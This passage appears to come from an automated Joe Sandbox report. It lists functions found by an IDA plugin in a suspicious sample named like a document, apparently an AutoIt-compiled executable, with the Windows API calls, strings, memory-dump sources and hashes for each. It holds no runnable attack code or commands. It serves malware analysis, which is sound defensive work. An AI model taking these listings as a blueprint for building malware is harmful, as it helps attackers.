                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: CapsDevice$ExceptionRaiseRelease
                                                        • String ID:
                                                        • API String ID: 603618608-0
                                                        • Opcode ID: ee2f65b4208a175bb7a04f3e29aff0ac681a5807edd7f01ce01aa6f75e83f660
                                                        • Instruction ID: 07a4c076989959d09babb674b9fbab9b8d6caec8e9ed145b5bdd7a47c4ab68a6
                                                        • Opcode Fuzzy Hash: ee2f65b4208a175bb7a04f3e29aff0ac681a5807edd7f01ce01aa6f75e83f660
                                                        • Instruction Fuzzy Hash: D7016775E40319BFEB109BA6DC49B5EBFB8EB48751F008066FE04AB290D6759D01CF61
                                                        Function 007387D7 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __init_pointers.LIBCMT ref: 007387D7
                                                          • Part of subcall function 00731E5A: __initp_misc_winsig.LIBCMT ref: 00731E7E
                                                          • Part of subcall function 00731E5A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00738BE1
                                                          • Part of subcall function 00731E5A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00738BF5
                                                          • Part of subcall function 00731E5A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00738C08
                                                          • Part of subcall function 00731E5A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00738C1B
                                                          • Part of subcall function 00731E5A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00738C2E
                                                          • Part of subcall function 00731E5A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00738C41
                                                          • Part of subcall function 00731E5A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00738C54
                                                          • Part of subcall function 00731E5A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00738C67
                                                          • Part of subcall function 00731E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00738C7A
                                                          • Part of subcall function 00731E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00738C8D
                                                          • Part of subcall function 00731E5A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00738CA0
                                                          • Part of subcall function 00731E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00738CB3
                                                          • Part of subcall function 00731E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00738CC6
                                                          • Part of subcall function 00731E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00738CD9
                                                          • Part of subcall function 00731E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00738CEC
                                                          • Part of subcall function 00731E5A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00738CFF
                                                        • __mtinitlocks.LIBCMT ref: 007387DC
                                                          • Part of subcall function 00738AB3: InitializeCriticalSectionAndSpinCount.KERNEL32(007CAC68,00000FA0,?,?,007387E1,00736AFA,007C67D8,00000014), ref: 00738AD1
                                                        • __mtterm.LIBCMT ref: 007387E5
                                                          • Part of subcall function 0073884D: RtlDeleteCriticalSection.NTDLL(00000000), ref: 007389CF
                                                          • Part of subcall function 0073884D: _free.LIBCMT ref: 007389D6
                                                          • Part of subcall function 0073884D: RtlDeleteCriticalSection.NTDLL(007CAC68), ref: 007389F8
                                                        • __calloc_crt.LIBCMT ref: 0073880A
                                                        • GetCurrentThreadId.KERNEL32 ref: 00738833
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                        • String ID:
                                                        • API String ID: 2942034483-0
                                                        • Opcode ID: 60ecb3ef63c8823c00339b6249d940bce6b751cddee09d387b8c17d1ee37b81b
                                                        • Instruction ID: 8f18d356e8741f137d1a64368a217d3d02f387296afb124f8ec2ac519f9a222a
                                                        • Opcode Fuzzy Hash: 60ecb3ef63c8823c00339b6249d940bce6b751cddee09d387b8c17d1ee37b81b
                                                        • Instruction Fuzzy Hash: CDF06D731297219EF2A57778BC0BA8A26C08F01774F654A2AF460D60D3FF7D8841415A
                                                        Function 0075A3D2 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                        • String ID:
                                                        • API String ID: 1423608774-0
                                                        • Opcode ID: 7fafe1ea5046aebcc6bd206dd61790ef0280a5a83e871b586b8352b98c247913
                                                        • Instruction ID: e1debaafd1595c6d8d761445c84ee9bf2b793944eac16b3e6b0a8f4c685ab8d7
                                                        • Opcode Fuzzy Hash: 7fafe1ea5046aebcc6bd206dd61790ef0280a5a83e871b586b8352b98c247913
                                                        • Instruction Fuzzy Hash: 8A01A932141611EBD7252B64ED48DEB7765FF49703740463AF90392061CBFCAC05CB65
                                                        Function 00711867 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00711898
                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 007118A0
                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 007118AB
                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 007118B6
                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 007118BE
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 007118C6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Virtual
                                                        • String ID:
                                                        • API String ID: 4278518827-0
                                                        • Opcode ID: bf0f7c0f2a9fb1198da46a456c28ffaec6130010a170a49affa465e2fd0b6af8
                                                        • Instruction ID: 78c3826fad99a749cf3dd11a1be2efff2ed2ff1e950f7fb746807b0fbeb13a0e
                                                        • Opcode Fuzzy Hash: bf0f7c0f2a9fb1198da46a456c28ffaec6130010a170a49affa465e2fd0b6af8
                                                        • Instruction Fuzzy Hash: B10167B0902B5ABDE3008F6A8C85B52FFB8FF19394F04411BA15C47A42C7F5A864CBE5
                                                        Function 007584F4 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00758504
                                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0075851A
                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 00758529
                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00758538
                                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00758542
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00758549
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                        • String ID:
                                                        • API String ID: 839392675-0
                                                        • Opcode ID: 0610b285fcf6b8c750a1cef779a93794fae7e9070b199ba4b599dc2213a95b3f
                                                        • Instruction ID: d25318284645fbf05001c3bd6f7ac57775066b08910d0663ba71a08187c32ba2
                                                        • Opcode Fuzzy Hash: 0610b285fcf6b8c750a1cef779a93794fae7e9070b199ba4b599dc2213a95b3f
                                                        • Instruction Fuzzy Hash: BAF09033240158BBE73017529C0EEEF3A7CDFC6B51F00401AFA0192050E7A82E02C6B9
                                                        Function 0075A31D Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • InterlockedExchange.KERNEL32(?,?), ref: 0075A330
                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 0075A341
                                                        • TerminateThread.KERNEL32(?,000001F6,?,?,?,007866D3,?,?,?,?,?,0071E681), ref: 0075A34E
                                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,007866D3,?,?,?,?,?,0071E681), ref: 0075A35B
                                                          • Part of subcall function 00759CCE: CloseHandle.KERNEL32(?,?,0075A368,?,?,?,007866D3,?,?,?,?,?,0071E681), ref: 00759CD8
                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 0075A36E
                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 0075A375
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                        • String ID:
                                                        • API String ID: 3495660284-0
                                                        • Opcode ID: 70fab343d7761550fd0052defcd430fb1673c00aacf3ecc0b1074fc4efc7bce7
                                                        • Instruction ID: 0b2147ad0d3b9e3b69198cf3d50a678910f124af81a9634699487507c5e391ae
                                                        • Opcode Fuzzy Hash: 70fab343d7761550fd0052defcd430fb1673c00aacf3ecc0b1074fc4efc7bce7
                                                        • Instruction Fuzzy Hash: 82F08232141211EBD3212B64ED4CDDB7B79FF8A302B404522F603910B1CBBD9D06CB65
                                                        Function 0071C320 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 259fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memmove.LIBCMT ref: 0071C419
                                                        • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,?,00000000,?,00756653,?,?,00000000), ref: 0071C495
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: FileRead_memmove
                                                        • String ID: Sfu
                                                        • API String ID: 1325644223-2188574825
                                                        • Opcode ID: 3f2f2c649033e477e65f87bbcd709c1477d9c8a537b58ddabb9cb76f78650312
                                                        • Instruction ID: 740ce77ab0a46274373ff1090ea93d5453b91a182990227489ecc9619bde0d10
                                                        • Opcode Fuzzy Hash: 3f2f2c649033e477e65f87bbcd709c1477d9c8a537b58ddabb9cb76f78650312
                                                        • Instruction Fuzzy Hash: CCA1E030A44619EBDF01CFA9C885BADFBB0FF05300F14C199E8659B281D739E9A1DB91
                                                        Function 0072D7C7 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0073010A: std::exception::exception.LIBCMT ref: 0073013E
                                                          • Part of subcall function 0073010A: __CxxThrowException@8.LIBCMT ref: 00730153
                                                          • Part of subcall function 0071CAEE: _memmove.LIBCMT ref: 0071CB2F
                                                          • Part of subcall function 0071BBD9: _memmove.LIBCMT ref: 0071BC33
                                                        • __swprintf.LIBCMT ref: 0072D98F
                                                        Strings
                                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0072D832
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                        • API String ID: 1943609520-557222456
                                                        • Opcode ID: 5b1a436f337887739a68a6dad0290187d0f87e71b5ef378e4dda9203b1888003
                                                        • Instruction ID: 73e30baac4b2b6f91771e918de04475e6962926da33bbbf7481dfbaeda10702e
                                                        • Opcode Fuzzy Hash: 5b1a436f337887739a68a6dad0290187d0f87e71b5ef378e4dda9203b1888003
                                                        • Instruction Fuzzy Hash: 65914A71108211DFC724FF28D889DAAB7A5FF85710F00495DF496972E2DB28EE45CB92
                                                        Function 0076B482 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VariantInit.OLEAUT32(?), ref: 0076B4A8
                                                        • CharUpperBuffW.USER32(?,?), ref: 0076B5B7
                                                        • VariantClear.OLEAUT32(?), ref: 0076B73A
                                                          • Part of subcall function 0075A6F6: VariantInit.OLEAUT32(00000000), ref: 0075A736
                                                          • Part of subcall function 0075A6F6: VariantCopy.OLEAUT32(?,?), ref: 0075A73F
                                                          • Part of subcall function 0075A6F6: VariantClear.OLEAUT32(?), ref: 0075A74B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                        • API String ID: 4237274167-1221869570
                                                        • Opcode ID: a6d57bbe2269df798be621e3ec52349b970f7bc46fed64b69517a3bd3ed93481
                                                        • Instruction ID: 7229911d1ff4e72cda78ce8d78d3cd9dd209614ed4ec90e7563ea4b5d2abdaaf
                                                        • Opcode Fuzzy Hash: a6d57bbe2269df798be621e3ec52349b970f7bc46fed64b69517a3bd3ed93481
                                                        • Instruction Fuzzy Hash: A4913A74604301DFC710DF28C48599AB7E4AFC9714F14496DF88ADB3A2DB39E985CB92
                                                        Function 00755D65 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00713BCF: _wcscpy.LIBCMT ref: 00713BF2
                                                        • _memset.LIBCMT ref: 00755E56
                                                        • GetMenuItemInfoW.USER32(?), ref: 00755E85
                                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00755F31
                                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00755F5B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                        • String ID: 0
                                                        • API String ID: 4152858687-4108050209
                                                        • Opcode ID: 088802e31580665026315e73e9f3d487806f5df6b012fc2c75627d5b9bd41eec
                                                        • Instruction ID: 07d16a05850150295c32692d109b4a2587a80d42629653b4752eb75b4827332b
                                                        • Opcode Fuzzy Hash: 088802e31580665026315e73e9f3d487806f5df6b012fc2c75627d5b9bd41eec
                                                        • Instruction Fuzzy Hash: 2B5125316187419BD7249B28C8A5AEBB7E4EF45321F08062DFC91D31E1DBBCCD498792
                                                        Function 00755A25 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 00755A93
                                                        • GetMenuItemInfoW.USER32 ref: 00755AAF
                                                        • DeleteMenu.USER32(00000004,00000007,00000000), ref: 00755AF5
                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,007D18F0,00000000), ref: 00755B3E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Menu$Delete$InfoItem_memset
                                                        • String ID: 0
                                                        • API String ID: 1173514356-4108050209
                                                        • Opcode ID: 2fd4b29d4553cbdb381081f1e6f3619eab8355de3d442add7b3a1f4dccc40863
                                                        • Instruction ID: 545f2037cf28133c3fff3a17cb86d1bf19932b1c044e289c9672f000569c6d1a
                                                        • Opcode Fuzzy Hash: 2fd4b29d4553cbdb381081f1e6f3619eab8355de3d442add7b3a1f4dccc40863
                                                        • Instruction Fuzzy Hash: 4741D2B1204741EFD720DF24C8A8B9AB7E4EF84315F14461DF855972D1D7B8E908CB62
                                                        Function 00770458 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CharLowerBuffW.USER32(?,?,?,?), ref: 00770478
                                                          • Part of subcall function 00717F40: _memmove.LIBCMT ref: 00717F8F
                                                          • Part of subcall function 0071A2FB: _memmove.LIBCMT ref: 0071A33D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: _memmove$BuffCharLower
                                                        • String ID: cdecl$none$stdcall$winapi
                                                        • API String ID: 2411302734-567219261
                                                        • Opcode ID: 63e948107078b82335725e0d7258c37dd876aa8a280ec146d373f5fdddeefa4a
                                                        • Instruction ID: e0b749f0401b209c1628117a20799e4a751523e72a37214d66420fa5f8da82be
                                                        • Opcode Fuzzy Hash: 63e948107078b82335725e0d7258c37dd876aa8a280ec146d373f5fdddeefa4a
                                                        • Instruction Fuzzy Hash: 0A31CD7450061AEBCF04EF68C840EEEB3B5FF05350B108A29E826A72D1DB39E945CB80
                                                        Function 0074C600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0071CAEE: _memmove.LIBCMT ref: 0071CB2F
                                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0074C684
                                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0074C697
                                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 0074C6C7
                                                          • Part of subcall function 00717E53: _memmove.LIBCMT ref: 00717EB9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$_memmove
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 458670788-1403004172
                                                        • Opcode ID: 04b66d720f8d5d266a8b788d6911c684b3793fee632487dc30457a64508b52f3
